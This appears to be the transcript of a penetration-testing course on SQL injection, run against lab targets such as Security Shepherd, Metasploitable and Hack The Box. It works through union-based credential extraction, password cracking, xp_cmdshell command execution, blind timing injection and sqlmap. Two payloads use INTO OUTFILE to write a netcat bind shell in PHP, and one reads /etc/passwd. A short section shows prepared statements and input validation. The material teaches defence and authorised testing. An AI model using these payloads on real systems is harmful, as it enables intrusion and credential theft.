advance of cloud and software as a service delivery, web portals are now the dominant means of accessing applications and are often supported by a back-end SQL server. With the prevalence of SQL, adversaries will look for every opportunity to take advantage of unprotected SQL-based applications to gain access to our information and systems. We need to protect our systems, and that means understanding the basics of the SQL language and understanding how it can be used to penetrate our systems. I'm Malcolm Shaw, and I've spent a career helping governments and businesses protect their systems. I'd like to invite you to take this course and learn how SQL injections work. Now let's get started with SQL injections. This is a practical course, and we'll be using Kali Linux-based tools to do testing, and we'll be using targets in the offensive security and hack-the-box online penetration testing labs. Where possible, I'll use the free subscription targets in these labs, but some of the more complex targets will be in the main labs. You should be competent in Windows and Unix host technologies. A good understanding of HTTP and the SQL language would be an advantage. You'll need to have a good working knowledge of Kali and some hands-on experience of testing. You should have a working knowledge of web testing tools, and you should have taken the Ethical Hacking Web Servers and Applications course. And if you've taken the Advanced Web Testing course, that would be an advantage. This is one of a series of advanced penetration testing courses, and in addition to Kali Linux, it uses some third-party testing software. While we've done our best to ensure that the tools we use and the sites we reference are legitimate, testing sites can be targets for hackers, and we can't provide any assurance that these sites might not be compromised when we visit them. Some of the sites which store the testing tools are detected as dangerous because the tools have similar signatures to malware and may raise antivirus alerts when you visit them. The testing tools we use are extremely powerful. They may demonstrate some of the same signature characteristics as malware and malicious implants, and may raise antivirus alerts when you try to download them. Again, we can't provide assurance that the software hasn't been compromised when you download it. And so, as for any other software from the internet, you need to exercise due diligence and take personal responsibility for anything you load into your system. The testing we do is mostly carried out inside a virtual environment to contain any unplanned effects of testing tools. And in the unlikely event that you do download malware, this will also help contain any impact. In the early days of computing, we wrote applications which managed data records. The applications were typically written in COBOL, and the records were in an index sequential or ISAM file. There's still many of these applications around today in government and industry. However, times moved on, and in the 1980s, a new form of data management emerged called relational databases. Relational databases consist of data held in records as they were in ISAM, but designed in such a way as to have relational links between fields in one part of the database and key identification fields in another. This meant that instead of repeating, for instance, Bowie in the town field, we could have a separate area of towns, with Bowie being represented by, say, 20715, and its record containing all the relevant town attributes. In relational database terminology, we call these separate parts of the database tables. Then whenever we need to have Bowie in a record, we can just reference it as 20715 and look it up in the towns table when we need further details. There's a fair bit of theory around design of relational databases, but we won't be covering that in this course. In order to understand SQL, we need to get hands-on. So let's jump straight into it and start using SQL. Kali comes with the MySQL server already loaded, so all we need to do is start it. We can do that by entering the command service MySQL start, and we'll enter our root password. Now the service has started, we can use the interactive client by entering sudo mysql -u root. Okay, we now have an SQL prompt, and it's showing we're using MariaDB. To be accurate, MariaDB isn't MySQL, but it is a variant that's evolved from MySQL, and for all intents and purposes, they're the same. We're in SQL now, so let's see what databases we can connect to. We use the show database command for that, and terminate it with a semicolon. show databases. And we can see we have the information schema, MySQL, and performance schema databases. Let's explore these. Firstly, we'll connect to information schema. We do that by saying use information schema. And we can list the tables in this database by saying show tables. We can see there's quite a lot of tables here. Let's take a look at one of them with the command select star from InnoDB sys tables. And we've listed the full record, but we could just list the table and ID by saying select table ID, name from InnoDB sys tables. The fields and command words aren't case sensitive, but we'll often see command words in capitals by convention. Let's take a look at the MySQL database. Use MySQL. Show tables. We've got a few tables here also, including one called user. Let's check what data fields are in the table. Show columns from user. And we've got a few columns as well, including two fields called user and password. Let's list them. Select user, password from user. And we can see just the root user with a blank password. Let's now create a user account called Marcus. We can do that with the grant statement, and we'll set the password to Marcus also. Grant all privileges on star.star to Marcus at localhost identified by Marcus. And now when we list the users, we can see we have the root user and also the Marcus account with its password hash. Okay, we've made a good start on using MySQL. Let's now log into MySQL as our new user Marcus and create a database to use for this course. MySQL -u Marcus -p. And enter our password, which is also Marcus. And we're now in MySQL as the user Marcus. We'll create a new database. Create database called Clio. And then we'll make it our current database. Use Clio, and we'll list the tables. Show tables. And we see it's an empty set because we haven't created any tables in this database yet. Let's build the tables next. We want our database to consist of 3 tables, one containing the basic details of Egyptian pharaohs, the second of the dynastic seat of power during the pharaoh's reign, and the third the tomb where the pharaoh was found. So let's create table pharaoh, and we'll put in columns pharaoh ID, which is an int, name, which is a var character, variable character of length 32, reign start, which is an int, reign end, which is an int, the dynasty, which is an int, and the tomb, which is again a variable character field of length 8 in this case. Okay, and we'll create our table dynasty, and we'll put in the fields dynasty ID, which is an int, the seat of power, which is a var char 20, and commentary, which is a var char 64. And finally, we'll create table tomb, which is tomb ID varchar 8, and again a commentary of varchar 64. We now need to load the tables, which we can do by using the files in your exercise folder. These are comma-delimited files containing the database information. We can see here the pharaoh.txt file. Okay, so we load those files by saying load data local in file pharaoh.txt into table clio.pharaoh fields terminated by quote, comma, quote, and semicolon. And that's loaded. And we do the same load data local in file dynasty.txt into table clio.dynasty fields terminated by comma, and finally load data local in file tomb.txt into table clio.tomb fields terminated by comma. Okay, we've now got our database set up. Just before we go, let's look at the contents of the tomb table. Select star from tomb, and we get a formatted listing of the records in the tomb table. Now we've got our SQL database set up, let's see how we use it. We've already seen how to list all records in a database. Let's see how we select just a subset of the table. Select star from Pharaoh, where dynasty equals 23. And we get just those pharaohs who ruled in the 23rd dynasty. We can look at partial matches using the percent sign. Select star from Pharaoh, where name like Shishong percent. And we get Shishong 1 to 5. We can change a field by using the update command. Update Pharaoh set dynasty equals 0, where name equals Shishonk 3. Let's look at the Shishonk family again. And we can see Shishonk 3 has a 0 dynasty value. Let's set that back to what it was originally. Set dynasty equals 23, where name is Shishonk III. We can also add records using the insert verb and delete records using the delete verb, and we can remove tables using the drop command. I won't run these, but you can check them out yourself. Another useful SQL command is the system command, which enables us to run bash or Windows commands. For instance, we can do a folder listing by saying system ls -al, and we get the folder listing. The join verb allows us to connect the relevant table entry from a second table where we have a reference. For example, select star from Pharaoh, inner join dynasty on Pharaoh dot dynasty equals dynasty dot did, and we get an extended table which contains all columns. We can combine that with our where clause also. Select with the inner join where name like Shishonk %. We don't have to return all columns. We can specify what we want. So instead of select star on our join, we can select Pharaoh ID, name, and seat. From Pharaoh in a join, dynasty on Pharaoh.dynasty is dynasty.did, where name is like Shishonk. There's another useful verb we can use called union. This combines multiple selects into a single output. Select phid, name from Pharaoh, where name like Shishonk, union select, again phid, name from Pharaoh, where name like Ptolemy. And we get the Shishonk and Ptolemy families. The union verb is normally used to combine two separate tables. We can use logical operators. Let's do our select of the Shishonks again. Select star from Pharaoh, where name like Shishonk. Now let's do that again with an OR statement. Select star from Pharaoh, where name like Shishonk, or 1 equals 1. And we get the whole table. This is because 1 always equals 1. We can also use the expression true. Select star from Pharaoh, where name like Shishonk %, or true. And we get the full table again. Okay, we've now got sufficient understanding of SQL to go do some SQL injection. Before we get into SQL injection proper, let's take a look at another way of accessing SQL databases if we have access to the service on port 3306. We can check that by running nmap on port 3306, and we can see it's open. We'll use our local Kali system on 127.0.0.1, but we could be doing the same attack on a remote server. Let's assume we know there's a user called Marcus, and we may have got that from email. We'll need a set of potential passwords, and we can use the standard Kali rocku.txt. We'll use the Hydra tool to attempt to brute force our way in. Hydra -L Marcus -P, and we'll use a password file, user share word lists rocku.txt, and we'll run that against 127.0.0.1 MySQL service. And we can see it's attacking 127.0.0.1 on port 3306, and it very quickly finds that the password is also Marcus. If we don't know the username, we can try a list of usernames. I have a small file set up called names.txt. Cat names.txt, and we just have the 4 in there. Let's run them through again. In this case, we'll use capital L names.txt and the -u to loop round usernames first. And we'll again use rocku.txt as our password file. And we found our password for Marcus once again. Okay, so like any other service, if we have weak passwords, then we could well be exposed to an SQL breach even without our attackers resorting to injections. The OWASP folks have provided another training tool which we can use for SQL injections. It's the Security Shepherd, described on the website here. This comes as a virtual machine, and you import it as an appliance into VirtualBox. I've downloaded and imported it. It's running on IP address 10.0.2.19, and we're ready to go. I'll set my browser to proxy by going to Preferences, Network Settings, and Manual Proxy Configuration. Okay. And I'll start Burp Suite. I'll switch off Proxy Interception, and I'll set the target scope to 10.0.2.19. Okay. I'll browse to 10.0.2.19 and I'll accept the risk. And here we have the Security Shepherd login screen. When you do first start it up, you'll want to log in as admin with the password and submit. And you'll be asked to change the password. Okay, let's select the admin button and module management, and we'll change the module layout. I'll set the configuration to open floor mode, and I'll refresh the browser. And I'll open all levels. Okay, you may want to log out and register a user account, or you can continue with using the admin account. Let's just get into it and have a look at the challenges. And I'll select the third one down, Injections. Let's run the first challenge, NoSQL Injection 1. This is a MongoDB non-SQL injection, and we can see that we're presented just with a button to press. And when we do, we see Jimmy's gamer ID. However, the challenge is to find Marlowe's game ID. We can't do anything at this screen, but let's take a look in Burp Suite. When we look at the post message, we can see that it's a simple request which contains data starting with the gamer name equals, followed by what we saw as the ID. Let's send this to the repeater and go to the repeater tab, and then add a quote to the end of the message and press send. Okay, we can see that we've got a MongoDB error. This shows that we're able to inject. Let's try adding to the quote our normal forced true injection, or quote A quote equals quote A, and send. Okay, we still get an error, so we can't force it to evaluate as true this way. However, if we think this may be executed in a script, then we can try to add a forced return as an injected command and terminate the string as we normally would. There's a number of scripting options to try, and when we add end the inquiry, return true, and then we'll add var A equals quote A to finish off the final quote that we expect to be in the message. Okay, let's send that. And this time we get the full set of results. We can stop here and manually extract the information, or we can select Action, Request in Browser, in Original Session, copy the URL, and in our Browser tab, paste it, and we get the formatted information. We can copy the Marlowe, gamer ID, paste it, and submit it. And we've completed the task. Let's try one more. We'll try SQL Injection 1. Here we have a form request for an ID. So let's try our normal query again. 21 or 1 equals 1 dash dash. Get user, and we found no results. Let's change that to use a double quote, just in case that's the way the expression is. And get user, and we've got the results. And our result key, with a slight misspelling, can be copied and pasted and submit. This is a simple forced true injection. We've exploited a couple of the SQL injection features of Security Shepherd, but there's more to work on your SQL injection and indeed on your wider web testing skills. Let's take a look at the Metasploitable server. Before we get into SQL, we need to update the database details in Metasploitable. I've logged in and navigated to var www mutilidae, and we'll sudo nano config.inc, and I'll go down and change the database name from Metasploit to OWASP10, and save that, and we're ready to start. If we run an nmap against port 3306 on Metasploitable, nmap -ps -a 10.0.2.8 -p 3306, we find it's open and running MySQL 5.0.51a. The first thing we'll try to do now is access the SQL server remotely with the default root account. MySQL -h 10.0.2.8 -u root. And we get in. We can now check the databases. Show databases. And let's use MySQL. And look at its tables. Show tables. And we'll select user, password from the user table. And we see that we have 3 users with no password set. Let's connect to Metasploitable and select Mutilidae. And we can look at the OWASP top 10 injection, extract data, user information. We're presented with a login screen, and we can always try admin, but that doesn't work. So let's now try an injection into the username field, Sam or true. And the injection works, and we have 16 records listed. Note we included the hash or # at the end of the injection so that the remainder of the query, including the password check, is commented out. We could also have used 2 dashes in place of the hash or #. Let's now try a union and see what we can do with this. Firstly, we need to have the same number of columns as are in the main database, but we don't know how many there are. We can work it out using a special trick with the order by clause. Sam or true, order by 1, and view account details. And as expected, we have the 16 records ordered by the first field. Now let's order it on column 2, Sam or true, order by 2. And that also works. And we carry on like this, Sam or true, order by 3, which works, Sam or true, order by 4, which works, Sam or true, order by 5, which works, SAM, or true, order by 6, which fails. So we can order on column 5, but not on column 6. So now we know there are 5 columns being extracted from the database. Let's try using the union select injection. SAM, or true, union select 1, 2, 3, 4, 5. And view account details. We now have 17 records, including at the bottom 2, 3, 4. So we know we're selecting 5 columns on the selection and printing out columns 2, 3, and 4. Let's now change our injection, and we can drop some of the SAM and the or true and just inject union select. We don't want the first column, but we want to show database, user, and version. And we need to put in the 5th column. And we now get out our database OWASP 10, the user, root at localhost, and the version of MySQL. So we've injected into the database and we've pulled out database functions. We can retrieve database information using the same technique. Let's see what tables we've got. We can do a union select, ignore column 1, and we'll now print out table schema and table name, and we won't worry about column 4 or 5 from information schema.tables and view account details. We've got a lot of records found. We have 430 tables, and we can see as we go through them a users table in DVWA, our normal user table in MySQL, and we have an accounts table in OWASP 10. These might all be of interest to us. Let's try that injection again, and this time we'll say union select or column 1, and we want to print column name. And we're not interested in printing anything else in columns 3, 4, and 5. And we're going to print that from information schema.columns, where table name equals accounts. And that's the end of our injection. And we have 5 records found with username and password showing. We can now extract our database contents. Again, run a union select, nothing in column 1, username in column 2, password in column 3, and nothing in column 4 or 5. And we'll extract that from accounts. And we get the credentials with the passwords being in plain text. Let's run the injection again to extract column names, this time from the users table in the DVWA database. Union select column 1, column name, nothing in columns 3, 4, or 5, from information schema.columns where table name equals users. This time we have 6 records found, and we can see a user and password column. We can now extract the database contents again. While we don't need to in this case, sometimes we may only be able to extract a single column, and in that case we can use the concatenation function. Let's see how we do that. Union select, don't worry about column 1, and then we'll put concat, and I'll be doing concat twice because I want to concatenate 3 items. I'll take the user 0 times 3a, hexadecimal 3a, and then concatenate both of those with password. And then I don't worry about columns 3, 4, or 5. Extract those from, in this case, dvwa.users. And we've now got the user and password details. And we can see the password column holds a password hash. I've put the set of user password information into a file called dvpass. Let's go crack them with John the Ripper. John dvpass, and we'll tell John that the format is raw MD5, although John could work that out for himself. And very quickly we find the passwords. Admin's password is password, as is Smith's. Gordon B is ABC123. Pablo is let me in, and Charlie is 1337. And we can show them on John the Ripper and get them listed out. Now we know how to use union select to achieve an injection. Let's see how we can access operating system functions using the union select clause. Union select, and we'll use the load file function, and we'll ask it to load /etc/password, comma, null, and finish our injection. And we get 1 record found, which is the data from our etc password file. So now we have a way of listing files. We can also store files on the target. Let's store some text in a file in the temp folder. Union select. This is my test data 2, 3, 4, 5, and we use into out file /tmp /mytest. Okay, and view account details, add username or password. And if we check on Metasploitable, I'm in the temp folder, and we have a mytest file. When we cat mytest, this is my test data. So the testing file has been created. This file can be script code, for example, a PHP file. Of course, we can't remotely execute PHP code from temp, and we can't upload into a web folder from Utilidae. What we really want is to be able to write executable scripts into a remotely accessible web folder, which if we have a generally available upload folder, we may be able to do so. However, let's run the command again, this time uploading a PHP script file. We do union select, and going to upload is PHP system and nc -lp 2222 -e/bin/bash So that will run netcat and listen on port 2222. And we'll close that off. And 2, 3, 4, 5. Into out file /temp /net.php. And close off our injection, and we'll run that. And when we look at the temp folder, we can see our net.php file has been uploaded. Often our objective when doing an SQL injection is to obtain credentials, and just as often, the password is likely to be hashed. It's useful, therefore, to be able to crack hashes we find in SQL systems. When we create a user in SQL, we've already seen the form of hash we get. Let's look at Marcus again. We'll use MySQL, and we'll select user, password from user. Now let's select this hash and try to crack it in CrackStation. I'll paste it in. I'll confirm that I'm a real person and crack the hash. And CrackStation recognizes that this is a MySQL hash and it's easily cracked. I've got a file with another hash that we might find in an SQL database. Cat hash MD5. And we can see this looks different. It starts with $signs. I'll copy this. I'll paste it into CrackStation again. I'm not a robot, and I'll crack it. But it's an unrecognized hash format. Let's take a look at the Hashcat website, where we see different types of hash formats. If we scroll down to hash mode 500, we can see this looks similar to the hash we've found. It looks like we've got a salted MD5 hash. We can now try Hashcat to recover the passwords. For the purpose of this exercise, I've set up a small dictionary called My Words. And we'll use that to demonstrate how to crack the salted MD5 password. Hashcats -M500 hash MD5, and we'll use My Words as the password file. And Hashcat recovers the password, which is in fact Hashcat. SQL Server Express comes as a free download for Windows 10. I've got it installed on my Windows 10 system, so let's go to the SQL Server Management Studio. I'll take the default SQL Express instance, which in my case is Shuttle SQL Express. And we now have access to the instance in the Management Console. Let's make sure we're set up to use transactional queries. We'll select Tools, Options, Query Execution, SQL Server, General, and check the box By Default Open New Queries in SQL Command Mode. And OK. Let's also right-click on the Shuttle SQL Express connection and select Facets. We'll change the drop-down to Server Security and set XP Command Shell Enabled to True. OK. Ignore the message about Server Agent and close the dialog. We can make a new database by right-clicking Databases and then entering the name Clio. New database, Clio. OK. And if we expand databases, we can see we have Clio. We can import our Pharaohs table by right-clicking on the Clio database, selecting Tasks Import Flat File. And we'll specify the input file, which we have in our exercise folder. We'll click Next, and next. We'll set up the column names, which are PHID, and which will make a small int. Name, make that a varchar 32. We'll put rain start, we'll just leave it as that. Rain end, dynasty, and tomb as varchar 8. I won't bother with keys, so we can just click next and finish. And close. Now we can use our Windows command shell to execute transactional queries on the database. We use the SQL command program to connect to the SQL instance. Let's see what databases we have. Select name from sys.databases. Go. And we list our databases. Let's use our Clio database. Use Clio. Go. We can run a union select on this. Select name from Pharaoh. Union select testing. Go. And we get the results. Note the entry testing is in sort order in the results. We can access SQL Server system names. Select null from Pharaoh. Union select quote $ SQL CMD user to get our current user bracket quote. Go. And we get our username, which is user. If the instance has the command shell extended procedure configured, we can use this to run system commands. Execute XP command shell who am I? Go. And we're NT service MS SQL $SQL Express. If we encounter errors with command shell, it may be because it's not enabled. However, we can enable it if we're a sysadmin. Let's see how we check if we're a sysadmin. We do this with select null from Pharaoh union select is server role member sysadmin. Go. And we get a 0 and a 1 back. The 0 is the integer interpretation of the blank field, and 1 is the sysadmin flag. Indeed, we are a sysadmin. Now, if we want to enable XP command shell, we can do that with 4 commands. Execute sp configure show advanced options, 1. Reconfigure, execute sp configure xp command shell, 1. Reconfigure and go. In our case, we see that command shell is changed from 1 to 1. We were already enabled for it. We can't use the XP command shell directly in the union, but if we have a multi-line option on, then we can add it to the end of the line. Select null from Pharaoh union select null execute XP command shell dir c:/ users and go. And we get our directory listing out. There are other ways to access system capabilities, for example using the sysdmos enumerate file system functions to list text files. We'll go, and we found a user.txt file, our normal pen testing flag. There are many other sys stored and extended procedures in SQL Server, but these can tend to be somewhat unreliable. Nevertheless, it's worth spending a bit of time exploring them. Another useful SQL system to look at is Oracle, and it too has a slightly different way of accessing database information. Oracle XE is a free download for Windows and Linux and is available from the website shown here. I've already downloaded this, extracted the zip file and installed it. Let's see how we use it. We can start the client by saying SQL+ / as sysdba, and we get the SQL prompt. Oracle comes with a core database, and it also has the option for application-specific databases, called pluggable containers. We can see the current database we're using by typing show con name, which shows we're using the core database. We can see what pluggable databases we have by entering show PDBs. Okay, we can see all tables in the database by running the query select table name from all tables. And there's rather a lot of them. We can restrict this somewhat to user tables by entering select table name from user tables. But again, there's quite a lot. If we scroll up, we can see our Pharaoh table. So let's go query it. We may wish to format our output, and we can do that by setting field widths using the col command. Col name format A32. Col dynasty format 99. Col tomb format A8. Okay, let's list our pharaohs. Select name, dynasty, tomb from pharaoh. As expected, we can use the normal SQL where, like, and order by clauses. So we'll select our pharaohs where name, like, A%, order by name. More importantly for our injections, we can do a union as well. Prior to Oracle 11g, we could obtain the password des-based hash from the password field. Let's use a union to get that. Select name, tomb from pharaoh, where 1 equals 0, which will suppress our pharaoh names. Union, select name, password from sys$.user$, and we'll limit it to where name equals sys. We've suppressed our Pharaoh output by forcing false, and the output from sys$user$ shows the name and a blank password hash field. We can check what password versions are in use by saying select password versions from DBA users where username equals sys. And we can see that for the sys user, it's 11G and 12C. From 11G onwards, the password field is null, and we need to use the spare for field, which is an SHA-1 hash. We can also use the concat function to build the multi-field string. Select concat name, comma, space, comma, spare 4 from sys.user$, where name equals sys. And we get the entry for the sys user, where we see the 11G hash shown with the S prefix and the 12C hash shown with the T prefix. Oracle is a bit different to MySQL and SQL Server, but it's still a target for SQL injections using similar techniques to those we've been looking at. Sometimes we can try an SQL injection and all we see is an error message, such as username not known, and we have no idea whether the query ran or not. It may have done, but we're blind as far as the results that came from it. Let's see how we handle that using our MySQL user table. Sudo MySQL -u root. Use MySQL, and let's select password from user, where user equals Marcus. Okay, we get our password hash, but let's assume that we have a form asking for a name and a password. Even when we try to run an SQL injection, we may not see any results other than an error message. In such cases, it can be quite useful to have a way to know that our injection was successful. If we can't get SQL to tell us that, then we need to infer that it was successful by triggering an event that we can detect. And this is referred to as blind SQL injection or inferential injection. Let's do our union SQL injection attack, but in our select, we'll use the special sleep function. Select password from user where user equals Marcus, union, select, sleep, 5 from user, where password like *1%. And that returns straight away. The function sleep5 did not get executed. Let's run that again and use the phrase like *2. And this returns after 5 seconds. The sleep function did get executed. We know the first character of the hash is star, and now that we've executed a sleep, we can infer, therefore, that the next character is 2. Similarly, when we run like 2a, we return straight away like 2b, return straight away like 2c, sleeps for 5 seconds. So our next character is C, and we can continue this until we recover the complete hash. Blind SQL queries are extremely powerful and used a lot in tools such as SQLmap, but they can be quite slow at recovering large amounts of data. Let's think about how we might code SQL queries to understand the way in which we need to protect them. We'll start with a simple Python program as shown here. Nano SQL1.py. All we do is open the SQL database, request a Pharaoh ID, select the correct record, and then print the Pharaoh's name, dynasty, and tomb. Let's run that. Python 3 SQL1.py. We'll request Pharaoh ID 175. Our code works, and here we have Cleopatra II. Let's check Pharaoh ID 50. And we find it's Kamosi. Now let's run an SQL injection attack, or 1 equals 1. And we get them all. Let's see how we can make our routine safe. Our first option is to use a prepared statement. Let's see what that looks like in code by updating our Python script. Nano safe SQL1.py. We now use the parameter prepared equals true when setting up the cursor, and we execute the query as a pre-coded statement and variable value. Let's now run it. Python 3, safe SQL1.py. So let's enter 50. And again, we get Kamosi. And now let's run an SQL injection attack, or 1 equals 1. And this time it doesn't get through. We're now safe from basic injection. One of the important pen testing tools for targets using SQL is SQL Map. Let's take a look at how we approach the initial penetration of the Europa web server on the LinkedIn Learning Lab using SQL Map. I've run an initial scan, and we can see there's SSH on port 22 and both HTTP and HTTPS web services. Port 80 presents the Apache default web page, as does port 443. Let's look at our Nmap scan again. We can see the SSL certificate uses the subject name europacorp.htb, with alternative names of www.europacorp.htb and adminportal.europacorp.htb. Let's add adminportal.europacorp.htb to our host file. Sudo nano /etc/hosts. And we'll put in 10.10.10.22 admin-portal.europacorp.htb, and we'll save that. I'll start up Burp Suite, and we'll turn off interception. And in our target scope, we'll add admin portal.europacorp.htb. Okay. On our website, we'll select Preferences, Network Settings, and Manual Proxy. Okay, and we'll now go to admin portal dot https admin portal dot europa corp dot htb. We'll accept the risk and continue. And we have a login page. This is looking for an email address and a password. Let's send in a request with a test email address and then check the message exchanges in Burp Suite. test@test.nz. We'll use password. Back in Burp Suite, we can see we've recorded our login post. When we check it out, we see our credentials are at the bottom of the message. We can use SQL Map to check the parameter string containing the credentials by using the --data switch to provide the data portion of the post. SQL Map -u https admin portal.europacorp.htb --data equals, and we'll put our data string in, email equals test %40 test.nz ampersand password equals password. Okay, we'll let SQL map run to its natural conclusion and then come back and look at the results. SQL map hasn't found anything at this stage, but let's make it try harder by forcing it to focus on the MySQL database. We'll also give it the login PHP form directly. So login PHP and minus dbms equals MySQL. Okay, we'll let that run to its natural conclusion. Okay, SQL map is finished and we can now see that we've identified 3 ways to inject SQL. Let's list out the databases. -DBS. And we can see the information schema and admin databases. Let's see what tables are in the admin database. -D admin -tables. And we can see we have a users table, and we'll dump out the contents. -T users -dump. And we won't try and crack these. And here we have our users and password hashes. Let's look at a more complex example where we have a general purpose execution function which handles both single and multiple SQL statements. I've got one prepared as SQL2.py. Here we're allowing for multiple statements in an SQL query. The function runSQL, starting on line 4, executes the query and a cursor is returned. It then iterates over the cursor, and for each iteration fetches the result. Then at line 9, for each result which has entries, it adds them to the results list. Let's run this. Python 3, SQL2.py. We'll enter 175, and we get our result of Cleopatra II again. Now let's do a more extensive injection. We'll terminate the query and we'll use the MySQL database. We'll select user and password from the user table, and then we'll revert back to our Clio database. We've now suppressed the Pharaoh output, but we get the list of users in the MySQL database. Again, we've taken advantage of having our input directly inserted into the SQL statement, and we've been able to code multiple statements in our injection. Let's see how we can make this more complicated SQL routine safe. It's not so simple to apply a prepared statement to a general purpose function covering multiple SQL statements. Nano safe SQL2.py. We can, however, simply validate our input. In this case, at line 20, we just need to check for quotation characters. We'll check for both single and double quotes with the code shown after the Pharaoh ID input. Okay, let's run that. Python 3, safe SQL2.py, and we'll enter 50, and we get Kamosi again. Now let's run our SQL injection attack. Quote or 1 equals 1, hash to get all entries, and this time it doesn't get through. We catch the injection attempt and don't run it. Before we leave Europa, let's go back to our Burp Suite capture and see what we can do with this. We'll right-click the post message and send it to the repeater. And we'll go to the repeater tab. We'll add our SQL injection into the email address. Quote, we'll use the plus for a space, or plus 1 equals 1, plus, we'll limit the output to 1, plus, and we'll terminate, plus, we'll put a space. And we'll send that, and we get a redirect response, so we'll follow the redirection. And then we'll show the response in the browser. To do that, we'll copy and paste and go. And we're running now as a logged in admin. Let's take a look at another SQL injection using SQL Map, using the Rabbit server on 10.10.10.71. We don't have this in the LinkedIn lab, so if you want to follow this yourself, you'll have to use the main Hack the Box system. Before we start, we'll load Burp Suite and proxy through it. We'll turn off interception, and we'll add 10.10.10.71 to our scope. Okay. We'll set our browser to proxy by going to Preferences, Network Settings, Manual Proxy Configuration. Okay, I've already done reconnaissance on this target and found it has a web portal on port 8080 and a folder named Complain. Let's connect to this. 10.10.10.71 on port 8080 in the Complain folder. We're presented with what's called a complain management system. And note, it says complain and not complaint. Let's register ourselves as a customer. Username user, password user 1234, customer, and our address is 1 Strangely Road. Our mobile number is 0500 0600 7765. And our address is a@b.c. And we'll register. Okay, now we've registered, let's log in. User with our password, user 1234, and we're a customer. We'll leave the website here for the moment while we check out the vulnerabilities on this system. If we run search exploit using the keyword complain, search exploit complain, we can see the first entry is a blind SQL injection. Let's take a look at it. We'll copy /user/share/exploitdb exploits PHP web apps 42968.txt to complain.txt. And let's have a look at that. Nano complain.txt. Okay, we can see the exploit has details of the vulnerability and also an SQL map command. So let's copy that. We can use the SQL map statement but we'll need to use the rabbit IP address and use our own session ID. So we'll paste that, and we'll go to burp and check out the post message where we logged in. That's our login. We can see the message has the string PHP sesh ID. Let's copy that. Copy that. Okay, we'll reconstruct the SQL map command with that. We'll paste that in here. And we'll change the address to 10.10.71:8080/complain. We'll also add -dbs to get a list of databases. -dbs. Okay, we've found a number of databases, including one called Secret. Let's choose that and take a look at what tables it holds. So we'll run that and query again with -d secret and look for minus tables. And we can see we have a users table. Let's dump that. -t users -dump. And we get a set of users and hashes. We can save this in a temporary file, and we'll crack using a dictionary-based attack. And the file we'll use for the attack is /user/share/wordlists/rocku.txt. And we're starting to crack the passwords. And out of the 10 accounts, we find 4 passwords. For the ones we didn't get, we can try CrackStation. Let's try Kane. We'll paste that. Confirm we're a person, and we'll crack the hash. And we find it's MD5 hash, and the password is Dora Day Bendita. I won't run through the others, but if we did, we'd find that we failed to crack Zephon and Tural, but we do find the rest. Okay, we've run our SQL injection using SQL map and obtained credentials from the database and cracked them. Let's take a look at another of the Hack the Box lab servers, Jarvis. And here we have a hotel site. We can navigate around a bit, but there's no active way to do anything. However, if we go to the rooms or dining and bar pages, we can click on an entry, and we see we have a PHP file with a parameter. If we add a quote to that and enter, we get a very strange response from the website. So maybe we should check this out with SQL map. So SQL map, http 10.10.10.143/room.php/?cod = 1. We haven't found an injection, but we see that SQL map recommends trying again with a random agent switch. So let's try that with -random agent. And we'll let the target use its own session ID. Okay, now we're getting somewhere, and the site looks like it's vulnerable. Let's check out its databases. We'll run that again with the switch -dbs. And we have hotel, information schema, MySQL, and performance schema. We're on familiar ground now, so let's check out the MySQL table. Use the database, MySQL, and minus tables. And as expected, we have a user table. So let's -t user, and let's dump it. And we'll let MySQL try cracking the hashes, and we'll give it user share word lists .u.txt as its dictionary file. And we get I miss you as the password. We have dbadmin with the password of I miss you. I've already done some further enumeration of the target, and I've found there's a PHP MyAdmin page. Let's go to that. Okay, and let's use our credentials. We'll log in with dbadmin and a password of I miss you. And we're in. We can see that we have an SQL panel. We can try select user, password from mysql.user. And we press the go button, and we can see we have dbadmin and its hash password. So that worked. After a bit of trial and error, we found that we could write into the var www.html folder. We can now create a PHP shell. We go back to our SQL page and type select PHP system nc -lp 2222 -e/bin/bash. Close the PHP and put that into out file /var /www/html/shelly.php. And do go. And that returned an empty result set, but it worked. So we can now run shelly.php and open up a listener. nc 10.10.10.143.2222. Who am I? I'm WW Data. And we've been able to get a shell from our initial SQL injection. I'm connected to the Hack the Box testing lab, and we'll do a scan of the server on 10.10.10.31. This is the Charon server, and if you want to follow hands-on with this, you'll need to be in the Hack the Box lab. Connecting to the site shows what looks like a food-focused website with a blog. There's no particular areas of interest on the site, but when we carry out our reconnaissance, we find there's a number of additional pages, including the CMS data login page. Let's go and take a look at that. /CMS data /login.php. We've got a login page here. I won't go through the whole process, but it turns out that this page isn't susceptible to SQL injection. Next, we'll go to the forgot password page. Okay, now we can start to test the page. First, let's see what it does with a random email. a@b.com. Okay, that gives an email not found, which we'd expect. Now let's try something we know will have an error if it's passed to the database. a@b.com, quote. Okay, we get a database error. This means we can get through to the database with an SQL injection. Let's see if we can do a blind SQL attack by using order by to check the number of columns. a@b.com, order by 1. And we don't get an error, so let's keep trying. a@b.com, order by 2, a@b.com, ordered by 3, a@b.com, ordered by 4, a@b.com, ordered by 5, and we have an error in the database. So we now know we have 4 columns. Now let's try to inject via a union. a@b.com, union select 1, 2, 3, 4, and we'll send. We get a response from the system in a new page saying there's an error here. Okay, there's something strange going on. One thing we need to be aware of is that the system may be looking for standard injection code such as union select. So let's modify this a bit. After a few tries, we find we get an incorrect format error if we have mixed case. Union select. Okay, we can see the message indicates that we're not providing the correct format. Given we have an email address as input, perhaps one of the columns needs to be in that format also. With a bit of trial and error, we find that it's the 4th column. a@b.com, union select 1, 2, 3, a@b.c. a@b.com, union select 1, 2, 3, a@b.c. And we get a valid response from the system saying that an email has been sent from parameter 4 to parameter 2. We have to keep column 4 as an email address, but let's try replacing column 2 with our user function. a@b.c, union select 1, user, 3, a@b.c. Okay, now let's try getting the database. a@b.com, union select 1, database, 3, a@b.c. And we're using the Super CMS database. So now we're getting data out of the system. When we try to display the tables using a@b.com, union select 1, table name, 3, a@b.c, from information schema.tables, we get an error with user not found with that email. We can postulate that one reason for this might be that we're returning too many table lines, and we need to limit it to just one at a time. So let's try that. a@b.com, union select 1, table name, 3, a@b.c, from information schema.tables, limit 0, 1. Okay, we have the first table name, character sets. We can now start incrementing the starting row and list the tables. It's a long slog through enumerating the database. However, after enumerating all the tables, we find a@b.com, union select 1, table name, 3, a@b.c, from information schema.tables, limit 63,1. But we do find an operators table. We can now take a look at the columns in the table using a similar technique. A at b.com, union select 1, column name, 3, A at b.c, from information schema.columns, where table name equal operators, limit 0,1. And we have an ID. Similarly, A at b.com, union select 1, column name, 3, A at b.c, from information schema dot columns, where table name equals operators, limit 1,1. And we get underscore username 